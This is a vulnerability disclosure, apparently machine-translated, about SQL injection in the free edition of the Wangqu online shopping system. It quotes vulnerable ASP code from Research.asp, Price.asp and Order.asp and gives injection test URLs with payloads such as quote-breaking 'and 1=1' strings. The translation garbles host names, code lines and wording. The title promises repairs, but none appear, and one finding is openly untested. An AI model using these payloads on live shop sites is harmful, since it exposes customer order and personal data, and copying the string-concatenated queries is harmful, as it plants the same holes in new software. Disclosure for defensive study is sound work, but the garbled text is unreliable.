SQL Injection and repair of Wangqu Online Shopping System flagship edition (Free Version)

Version: flagship version of Online Shopping System of Wangqu (Free Version)
 
Download: http://www.cnhww.com/down.asp? Id = 6
 
----------------------------------------------------------------------
 
Article 1:
 
/Research. asp
 
Selectname is not filtered, resulting in search injection.
 
Code:
 
Lines 7-12
 
Dim action, searchkey, anclassid, jiage, selectname
Anclassid = request ("anclassid ")
Searchkey = request ("searchkey ")
Jiage = request ("jiage ")
Action = request ("action ")
Selectname = request ("selectname") // obtain selectname. No rows 212-230 are filtered in the middle.
 
If anclassid <> 0 then
Select case action
Case "1"
Sql1 = "bookname like '%" & searchkey & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
Case "2"
Sql1 = "pingpai like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
Case "3"
Sql1 = "bookcontent like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") and
Anclassid = "& anclassid &""
End select
Else
Select case action
Case "1"
Sql1 = "bookname like '%" & searchkey & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &")"
Case "2"
Sql1 = "pingpai like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &") "// here I am using
Case "3"
Sql1 = "bookcontent like '%" & selectname & "%' and (shichangjia <" & jiage & "or huiyuanjia <" & jiage & "or vipjia <" & jiage &")"
End select
End if234 rows
 
Rs. open "select * from products where" & sql1 & "and zhuangtai = 0 order by adddate desc", conn, 1, 1:
 
Http://www.2cto.com/research. asp? Anclassid = 0 & action = 2 & jiage = 100000 & selectname = Beijing run % 'and 1 = 1 and' % '='
 
--------------------------------------------------------------------
 
Second:
 
/Price. asp
 
No filtering is performed on anid, resulting in Digital Injection.
 
Code:
 
74 rows:
 
Anid = trim (request ("anid") // obtain anid without any filtering in the middle of 104 rows:
 
If anid <> "then
Rs. open "select * from products where anclassid =" & anid & "order by adddate desc", conn, 1, 1:
 
Http: // MAID: 8080/price. asp? Anid = 62 and 1 = 1
 
---------------------------------------------------------------------
 
Third:
 
/Order. asp
 
Dan is not filtered, resulting in injection of the struct type.
 
Code:
 
64 rows:
 
Dingdan = request. QueryString ("dan") // get dan. There is no filtering among 66 rows:
 
Rs. open "select
Products. bookid, products. shjiaid, products. bookname, products. shichangjia, products. huiyuanjia, orders. actiondate, orders. shousex,
Orders. danjia, orders. feiyong, orders. fapiao, orders. userzhenshiname, orders. shouhuoname, orders. dingdan, orders. youbian, orders. liu
Yan, orders. zhifufangshi, orders. songhuofangshi, orders. zhuangtai, orders. zonger, orders. useremail, orders. usertel, orders. shouhuodi
Zhi, orders. bookcount from products inner join orders on products. bookid = orders. bookid where
Orders. username = '"& request. cookies (" Cnhww ") (" username ") &"' and dingdan = '"& dingdan &"' ", conn, 1, 1 structure:
 
The next order is placed first, and cannot be used by others
 
Http: // 127.0.0.1: 8080/order. asp? Dan = 201277143453 'and '1' = '1
 
----------------------------------------------------------------------
 
Article 4:
 
/My_msg.asp
 
No delid filtering is performed (I use the free version and cannot test it, but this vulnerability is very likely to exist)
 
----------------------------------------------------------------------